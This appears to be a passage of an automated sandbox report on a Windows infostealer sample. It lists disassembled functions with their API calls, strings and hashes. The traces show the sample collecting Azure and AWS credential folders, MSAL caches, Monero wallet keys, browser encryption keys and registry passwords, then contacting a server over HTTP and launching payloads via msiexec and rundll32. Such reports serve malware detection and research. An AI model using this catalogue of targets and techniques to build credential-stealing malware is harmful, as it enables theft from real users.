                  • Opcode ID: 6e9b42cb5674afdbfc27e04b19424737207c8946d3f1bcac5687bf7121d35e93
                  • Instruction ID: a0faac6c6e08b4057978e02ccaa823abd2bbd636020026784a5b47f00035b2c5
                  • Opcode Fuzzy Hash: 6e9b42cb5674afdbfc27e04b19424737207c8946d3f1bcac5687bf7121d35e93
                  • Instruction Fuzzy Hash: 95811B759511189FEB28DB50CD95FEAB7B8FB09710F008299E109A6180DF70ABCADF91
                  Function 00C14D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00C14DCD
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C1492C
                    • Part of subcall function 00C14910: FindFirstFileA.KERNEL32(?,?), ref: 00C14943
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00C14E59
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FDC), ref: 00C14971
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FE0), ref: 00C14987
                    • Part of subcall function 00C14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C14B7D
                    • Part of subcall function 00C14910: FindClose.KERNEL32(000000FF), ref: 00C14B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C14EE5
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C149B0
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C208D2), ref: 00C149C5
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C149E2
                    • Part of subcall function 00C14910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C14A1E
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,0179ED58), ref: 00C14A4A
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,00C20FF8), ref: 00C14A5C
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,?), ref: 00C14A70
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,00C20FFC), ref: 00C14A82
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,?), ref: 00C14A96
                    • Part of subcall function 00C14910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C14AAC
                    • Part of subcall function 00C14910: DeleteFileA.KERNEL32(?), ref: 00C14B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 406958f6d7e16a500dd05b139fd4715156a511f177a80164e24fdacd8f10d111
                  • Instruction ID: 4aa5bfec7164a906ca6740a7a090b70c047d70f9d9bc5b9c35cbf64c076e809c
                  • Opcode Fuzzy Hash: 406958f6d7e16a500dd05b139fd4715156a511f177a80164e24fdacd8f10d111
                  • Instruction Fuzzy Hash: D74186BAA402186BD714F770EC47FED7338AB65700F444464B545660C1EEB49BCDEB92
                  Function 00C19010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C1906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: e82792211f8be8cce1056b86901926704c062a981d8fdc8a732a1d0f8adce5f7
                  • Instruction ID: aff2c2171df83ce9ad7767dc1d989a8a22f5b5430b029fe93c55993faa854784
                  • Opcode Fuzzy Hash: e82792211f8be8cce1056b86901926704c062a981d8fdc8a732a1d0f8adce5f7
                  • Instruction Fuzzy Hash: 767149B5A40208AFDB04EFE5DC98FEEB7B8FB49310F148118F515AB290DB34A945DB61
                  Function 00C12E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C131C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C1335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C134EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 1c350f073c42f5726946c59e7ecf721752690e59babaf62850720d0bc3154050
                  • Instruction ID: 30eebec381a869c8db244fd4e0ed375cb01c777db1556a6495378ed3e53e3f75
                  • Opcode Fuzzy Hash: 1c350f073c42f5726946c59e7ecf721752690e59babaf62850720d0bc3154050
                  • Instruction Fuzzy Hash: 28121D718111089ADB09FBA0DD92FEDB738AF15310F504169F50676192EF346BCAEFA2
                  Function 00C152C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C06280: InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1
                    • Part of subcall function 00C06280: StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303
                    • Part of subcall function 00C06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335
                    • Part of subcall function 00C06280: HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385
                    • Part of subcall function 00C06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C063BF
                    • Part of subcall function 00C06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15318
                  • lstrlen.KERNEL32(00000000), ref: 00C1532F
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00C15364
                  • lstrlen.KERNEL32(00000000), ref: 00C15383
                  • lstrlen.KERNEL32(00000000), ref: 00C153AE
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: ef67b2b86c3b94dbf22a2cdda7c5966d16b35d397263aa6cc186c3610a47423d
                  • Instruction ID: 97785829b78ab3de95390d54313a8b70ec7c8fd65b5461226a8fc71d1e1eae34
                  • Opcode Fuzzy Hash: ef67b2b86c3b94dbf22a2cdda7c5966d16b35d397263aa6cc186c3610a47423d
                  • Instruction Fuzzy Hash: 0E510C30911148DBDB14FF61CD96AED7779AF52310F504028F8066A5D2EF34AB86FBA2
                  Function 00C112D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 0b87de4a8f35e14c417596f216906f7ac0ee15198641f1097a6d880ec86ee48f
                  • Instruction ID: b6648d8a502cfe8c40eb7c60a1b0d172060feb2b173fcf4e2a30dc0f00ac0000
                  • Opcode Fuzzy Hash: 0b87de4a8f35e14c417596f216906f7ac0ee15198641f1097a6d880ec86ee48f
                  • Instruction Fuzzy Hash: 20C1C5B59412099BCB14EF60DC89FEE7378BF55300F044498F50A67282DA74EAC9EF91
                  Function 00C14280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C142EC
                  • lstrcat.KERNEL32(?,0179E718), ref: 00C1430B
                  • lstrcat.KERNEL32(?,?), ref: 00C1431F
                  • lstrcat.KERNEL32(?,0179E4D0), ref: 00C14333
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C18D90: GetFileAttributesA.KERNEL32(00000000,?,00C01B54,?,?,00C2564C,?,?,00C20E1F), ref: 00C18D9F
                    • Part of subcall function 00C09CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C09D39
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C193C0: GlobalAlloc.KERNEL32(00000000,00C143DD,00C143DD), ref: 00C193D3
                  • StrStrA.SHLWAPI(?,0179EC48), ref: 00C143F3
                  • GlobalFree.KERNEL32(?), ref: 00C14512
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09AEF
                    • Part of subcall function 00C09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C04EEE,00000000,?), ref: 00C09B01
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09B2A
                    • Part of subcall function 00C09AC0: LocalFree.KERNEL32(?,?,?,?,00C04EEE,00000000,?), ref: 00C09B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00C144A3
                  • StrCmpCA.SHLWAPI(?,00C208D1), ref: 00C144C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C144D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00C144E5
                  • lstrcat.KERNEL32(00000000,00C20FB8), ref: 00C144F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 11fc068dab39601ed7bf7c512a93e77d0ec979df7107797a3947554f830defd9
                  • Instruction ID: 678c31bc146e0dfde91004a77f5c9a05de5ffbdad480475b5f43129be1fab459
                  • Opcode Fuzzy Hash: 11fc068dab39601ed7bf7c512a93e77d0ec979df7107797a3947554f830defd9
                  • Instruction Fuzzy Hash: CF7158B6D00218ABDB14EBE0DC8AFEE7379AF49310F044598F605A7181EA74DB49DF91
                  Function 00C01310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C012B4
                    • Part of subcall function 00C012A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C012BB
                    • Part of subcall function 00C012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C012D7
                    • Part of subcall function 00C012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C012F5
                    • Part of subcall function 00C012A0: RegCloseKey.ADVAPI32(?), ref: 00C012FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0134F
                  • lstrlen.KERNEL32(?), ref: 00C0135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00C01377
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C01465
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00C014EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: e87bb94ff685d268bd4596325335898a15d914793306af7b74a1af71397fe2a9
                  • Instruction ID: 2e491b40839026b55bd7c2a9717e5bb7cd44242c3669930b718c61e8aa986d4c
                  • Opcode Fuzzy Hash: e87bb94ff685d268bd4596325335898a15d914793306af7b74a1af71397fe2a9
                  • Instruction Fuzzy Hash: 5C5154B1D501185BDB15EB60DD96FED733CAF55310F4041A8B60A620C2EE306BCAEFA6
                  Function 00C075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C072D0: memset.MSVCRT ref: 00C07314
                    • Part of subcall function 00C072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C0733A
                    • Part of subcall function 00C072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C073B1
                    • Part of subcall function 00C072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C0740D
                    • Part of subcall function 00C072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C07452
                    • Part of subcall function 00C072D0: HeapFree.KERNEL32(00000000), ref: 00C07459
                  • lstrcat.KERNEL32(00000000,00C217FC), ref: 00C07606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C07648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00C0765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C0768F
                  • lstrcat.KERNEL32(00000000,00C21804), ref: 00C076A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C076D3
                  • lstrcat.KERNEL32(00000000,00C21808), ref: 00C076ED
                  • task.LIBCPMTD ref: 00C076FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
